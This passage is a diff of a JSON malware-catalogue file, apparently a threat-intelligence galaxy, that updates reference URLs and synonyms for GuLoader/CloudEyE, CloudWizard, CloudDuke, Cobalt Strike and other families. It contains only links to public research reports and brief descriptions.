"https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://research.checkpoint.com/2020/guloader-cloudeye/", - "https://twitter.com/TheEnergyStory/status/1240608893610459138", - "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/", - "https://www.youtube.com/watch?v=N0wAh26wShE", - "https://experience.mandiant.com/trending-evil-2/p/1", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.youtube.com/watch?v=K3Yxu_9OUxU", - "https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/", - "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", - "https://twitter.com/TheEnergyStory/status/1239110192060608513", - "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", - "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", - "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195", - "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two", - "https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/", - "https://twitter.com/VK_Intel/status/1255537954304524288", - "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/", - "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", - "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/", - "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/", - "https://www.crowdstrike.com/blog/guloader-malware-analysis/", - "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", - "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", - "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html", - "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4", - "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/", - "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/", - "https://twitter.com/VK_Intel/status/1252678206852907011", - "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", - "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans", - "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader", - "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://asec.ahnlab.com/en/55978/", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", - "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/", - "https://twitter.com/VK_Intel/status/1257206565146370050", - "https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa", + "https://www.youtube.com/watch?v=K3Yxu_9OUxU", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/", + "https://twitter.com/TheEnergyStory/status/1239110192060608513", + "https://www.youtube.com/watch?v=-FxyzuRv6Wg", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf", + "https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/", + "https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/", + "https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/", + "https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two", + "https://www.joesecurity.org/blog/3535317197858305930", + "https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/", + "https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/", + "https://labs.vipre.com/unloading-the-guloader/", + "https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/", + "https://www.youtube.com/watch?v=N0wAh26wShE", "https://malwation.com/malware-config-extraction-diaries-1-guloader/", "https://labs.k7computing.com/?p=21725Lokesh", - "https://labs.vipre.com/unloading-the-guloader/" + "https://sansorg.egnyte.com/dl/ALlvwK6fp0", + "https://twitter.com/VK_Intel/status/1257206565146370050", + "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", + "https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/", + "https://labs.k7computing.com/?p=20156", + "https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", + "https://twitter.com/VK_Intel/status/1255537954304524288", + "https://malwarebookreports.com/guloader-navigating-a-maze-of-intricacy/", + "https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/", + "https://twitter.com/TheEnergyStory/status/1240608893610459138", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blog.morphisec.com/guloader-the-rat-downloader", + "https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans", + "https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader", + "https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943", + "https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/", + "https://www.crowdstrike.com/blog/guloader-malware-analysis/", + "https://any.run/cybersecurity-blog/deobfuscating-guloader/", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://twitter.com/sysopfb/status/1258809373159305216", + "https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html", + "https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4", + "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader", + "https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/", + "https://twitter.com/VK_Intel/status/1252678206852907011", + "https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://research.checkpoint.com/2020/guloader-cloudeye/", + "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/", + "https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa", + "https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services", + "https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/", + "https://www.youtube.com/watch?v=gk7fCC5RiAQ", + "https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877" ], "synonyms": [ "GuLoader", @@ -18029,6 +18898,19 @@ "uuid": "966f54ae-1781-4f2e-8b32-57a242a00bb9", "value": "CloudEyE" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard", + "https://securelist.com/cloudwizard-apt/109722/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4d941367-b22e-4d01-930e-c757b58eff58", + "value": "CloudWizard" + }, { "description": "F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.", "meta": { @@ -18064,9 +18946,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://twitter.com/ClearskySec/status/963829930776723461", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", - "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" + "https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" ], "synonyms": [ "meciv" @@ -18081,8 +18963,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html" + "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145" ], "synonyms": [], "type": [] @@ -18095,8 +18977,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobaltmirage_tunnel", - "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools", - "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us" + "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us", + "https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools" ], "synonyms": [], "type": [] @@ -18109,649 +18991,667 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", - "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", - "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2", - "https://www.brighttalk.com/webcast/7451/462719", - "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery", - "https://isc.sans.edu/diary/27308", - "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir", - "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/", - "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/", - "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/", - "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems", - "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", - "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html", - "https://github.com/chronicle/GCTI", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2", - "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", - "https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/", - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", - "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", - "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/", - "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b", - "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/", - "http://www.secureworks.com/research/threat-profiles/gold-drake", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/", - "https://community.riskiq.com/article/c88cf7e6", - "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel", - "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", - "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", - "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment", - "https://isc.sans.edu/diary/rss/28664", - "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html", - "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks", - "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://malwarebookreports.com/cryptone-cobalt-strike/", - "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", - "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/", - "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", - "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/", - "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf", - "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", - "https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/", - "https://www.mandiant.com/resources/apt41-us-state-governments", - "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1", - "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", - "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility", - "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection", - "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/", - "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", - "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", - "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", - "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/", - "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", - "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/", - "https://isc.sans.edu/diary/rss/28752", - "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", - "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", - "https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/", - "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf", - "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", - "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", - "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/", - "https://twitter.com/Unit42_Intel/status/1458113934024757256", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", - "https://cert.gov.ua/article/703548", - "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", - "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", - "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f", "https://unit42.paloaltonetworks.com/atoms/obscureserpens/", - "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", - "https://www.malware-traffic-analysis.net/2021/09/29/index.html", - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", - "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", - "https://twitter.com/Unit42_Intel/status/1461004489234829320", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", - "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/", - "https://www.mandiant.com/media/10916/download", - "https://www.mandiant.com/resources/sabbath-ransomware-affiliate", - "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", - "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims", - "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", - "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control", - "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", - "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", - "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://www.bitsight.com/blog/emotet-botnet-rises-again", - "https://twitter.com/TheDFIRReport/status/1359669513520873473", - "https://twitter.com/Cryptolaemus1/status/1407135648528711680", - "https://www.arashparsa.com/hook-heaps-and-live-free/", - "https://www.qurium.org/alerts/targeted-malware-against-crph/", - "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/", - "https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html", - "https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage", - "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/", - "https://www.mandiant.com/resources/unc2452-merged-into-apt29", - "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/", - "https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/", - "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/", - "https://assets.virustotal.com/reports/2021trends.pdf", - "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/", - "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", - "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/", - "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", - "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", - "https://www.arashparsa.com/catching-a-malware-with-no-name/", - "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors", - "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/", - "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", - "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", - "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", - "https://twitter.com/redcanary/status/1334224861628039169", - "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", - "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", - "https://www.mandiant.com/resources/defining-cobalt-strike-components", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", - "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware", - "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts", - "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", - "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", - "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", - "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2", - "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf", - "https://cert.gov.ua/article/619229", - "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", - "https://blog.exatrack.com/melofee/", - "http://blog.nsfocus.net/murenshark", - "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/", - "https://community.riskiq.com/article/f0320980", - "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", - "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20", - "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass", - "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", - "https://blog.talosintelligence.com/2021/05/ctir-case-study.html", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", - "https://www.mandiant.com/resources/russian-targeting-gov-business", - "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html", + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7", + "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/", + "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html", + "https://thedfirreport.com/2021/05/12/conti-ransomware/", + "https://twitter.com/alex_lanstein/status/1399829754887524354", "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa21-148a", - "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", - "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/", - "https://security.macnica.co.jp/blog/2022/05/iso.html", - "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", - "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", - "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", - "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/", - "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware", - "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/", - "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", - "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", - "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", - "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf", - "https://401trg.com/burning-umbrella/ ", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.hhs.gov/sites/default/files/bazarloader.pdf", - "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike", - "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://isc.sans.edu/diary/rss/27176", - "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html", - "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html", - "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/", - "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", - "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", - 